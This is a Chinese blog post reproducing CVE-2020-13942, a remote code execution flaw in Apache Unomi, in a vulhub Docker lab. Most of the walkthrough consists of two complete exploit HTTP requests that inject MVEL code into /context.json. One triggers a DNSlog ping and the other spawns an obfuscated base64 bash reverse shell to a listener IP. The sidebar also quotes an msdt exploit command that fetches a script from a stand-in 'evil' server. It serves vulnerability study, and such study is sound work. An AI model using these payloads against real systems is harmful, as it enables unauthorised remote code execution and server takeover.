CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现

最新推荐文章于 2024-06-08 10:04:43 发布
最新推荐文章于 2024-06-08 10:04:43 发布
阅读量393 收藏
点赞数
分类专栏: 漏洞复现 文章标签: RCE Apache Unomi web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/123006251
版权

CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现

简介

Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。

Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:

Ø Web CMS 个性化服务

Ø 原生移动应用的分析服务

Ø 具有分段功能的集中配置文件管理系统

Ø 授权管理中心

漏洞概述

在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。

漏洞影响版本

Apache Unomi < 1.5.2

环境搭建

使用vulhub的环境即可

cd vulhub/unomi/CVE-2020-13942/
docker-compose up -d

漏洞复现

在浏览器中访问http://your-ip:8181出现如下页面即代表环境搭建成功

访问context.json进行抓包

将发包方式改为POST发包

DNSlog验证

POC:

POST /context.json HTTP/1.1
Host: 192.168.109.128:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 493

{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"ping xxxxxx.ceye.io\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}


反弹shell


POC:

POST /context.json HTTP/1.1
Host: 192.168.109.128:8181
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 569

{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwOS4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}


修复建议

1、尽可能避免将用户数据放入表达式解释器中。
2、目前厂商已发布最新版本,请受影响用户及时下载并更新至最新版本。官方链接如下:https://unomi.apache.org/download.html

super 硕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Unomi 远程代码执行漏洞复现(CVE-2020-13942)
doctor__的博客
07-20 354
目录漏洞信息环境搭建漏洞复现通过Python脚本执行getshell操作修复建议 漏洞信息 项目 Value 漏洞名称 Apache Unomi远程代码执行漏洞 漏洞编号 CVE-2020-13942 危害等级 高危 CVSS评分 7.2 漏洞厂商 Apache 受影响版本 Apache Unomi<1.5.2 漏洞概述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,
漏洞复现】vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 406
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关复现资料,阅读很多文章,最终发现有博主出现和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
探索个性化用户体验的利器 —— Apache Unomi
最新发布
gitblog_00096的博客
06-08 321
探索个性化用户体验的利器 —— Apache Unomi 项目地址:https://gitcode.com/apachearrow-nanoarrow/unomi 在当今数据驱动的时代,用户的每一次点击都蕴藏着巨大的价值,个性化的体验已成为企业竞争的新高地。今天,我们要向您隆重推荐一款开源神器——Apache Unomi,它如同一位幕后英雄,在A/B测试和个性化推荐中默默支撑,帮助您的业务精准触达...
为什么Apache Unomi开源[客户数据平台」值得一看
全网:架构师研究会
11-24 707
客户体验(CX)要求个性化,而个性化要求访问各种各样的客户数据。如今,这些数据通常在独立的、孤立的记录和参与系统中维护。然而,市场营销人员需要一个统一的360度客户数据视图来个性化内容并提出相关建议。客户数据平台(CDP)由此诞生,这是一种相对较新的CX数据主数据管理方法。自从cdp这个类别首次出现以来,在过去的18个月里,有很多关于cdp的文章。CMSWire之前发表的...
CVE-2020-13942 Apache Unomi 远程代码执行.md
04-13
CVE-2020-13942 Apache Unomi 远程代码执行
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
unomi-site:Apache Unomi网站
05-13
Apache Unomi网站源存储库 该项目包含Apache Unomi网站。 该网站是使用Maven过滤(针对版本号)生成的,然后传递给Jenkins以使用模板构建页面。 建造 您需要一台安装了Maven的机器来构建网站。 查看: git clone https://github.com/apache/unomi-site 运行构建: mvn clean install 生成的站点将位于target / generation-jekyll中 发布 要将本地网站发布到生产位置( ),您必须使用: mvn clean install scm-publish:publish-scm -Dusername=YOUR_APACHE_USERNAME -Dpassword=YOUR_APACHE_PASSWORD 生成jekyll网站 mvn clean install install
CVE -2020-13942 (Apache Unomi 远程代码执行漏洞)复现
weixin_39811856的博客
11-24 943
一、漏洞描述: Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞..
Apache Unomi 远程表达式代码执行漏洞CVE-2020-13942
黑白的博客
05-02 351
声明 好好学习,天天向上 漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码漏洞对应编号为CVE-2020-11975,而CVE-2020-13942
【CDP】为什么Apache Unomi开源[客户数据平台」值得一看
全网:架构师研究会
04-16 345
客户体验(CX)要求个性化,而个性化要求访问各种各样的客户数据。如今,这些数据通常在独立的、孤立的记录和参与系统中维护。然而,市场营销人员需要一个统一的360度客户数据视图来个性化内容并提出相关建议。客户数据平台(CDP)由此诞生,这是一种相对较新的CX数据主数据管理方法。自从cdp这个类别首次出现以来,在过去的18个月里,有很多关于cdp的文章。CMSWire之前发表的一篇文章提供了CDPs的一...
Apache Unomi 远程代码执行漏洞(CVE-2020-13942)复现
ximo的博客
03-24 246
简介 Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。 漏洞描述 在Druid 0.20.0及更早版本中,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户提供的JavaScript
Apache Unomi远程命令执行漏洞-CVE-2020-13942
weixin_44912035的博客
12-31 163
漏洞详情: Apache Unomi是一个Java开源客户数据平台,是用来管理客户和访问者的数据,并个性化客户体验。由于Apache Unomi允许远程攻击者使用包含任意类的MVEL和OGNL表达式发送恶意请求,最终可导致攻击者使用Unomi应用程序权限远程执行代码。 影响版本 Apache Unomi < 1.5.2 漏洞复现 访问页面如图所示: 构造如下请求包 数据包内容 POST /context.json HTTP/1.1 Host: 192.168.174.158:9443 Accept
远程代码执行漏洞—— CVE-2020-11975 Apache Unomi
aming小老弟
02-19 984
QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。 叮叮叮:产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司 民生项目:商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/ 安全项目:态势感..
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值